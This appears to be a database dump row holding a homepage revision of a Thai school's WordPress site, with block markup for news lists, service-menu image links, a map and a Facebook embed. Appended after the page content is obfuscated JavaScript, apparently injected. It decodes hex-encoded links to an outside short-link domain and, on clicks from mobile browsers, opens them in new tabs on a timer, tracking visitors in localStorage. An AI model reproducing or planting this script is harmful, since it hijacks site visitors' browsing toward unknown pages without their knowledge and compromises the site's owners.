:12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-15 11:31:40','2024-08-15 04:31:40','',14,'http://pakhaeng.ssk.in.th/?p=845',0,'revision','',0),
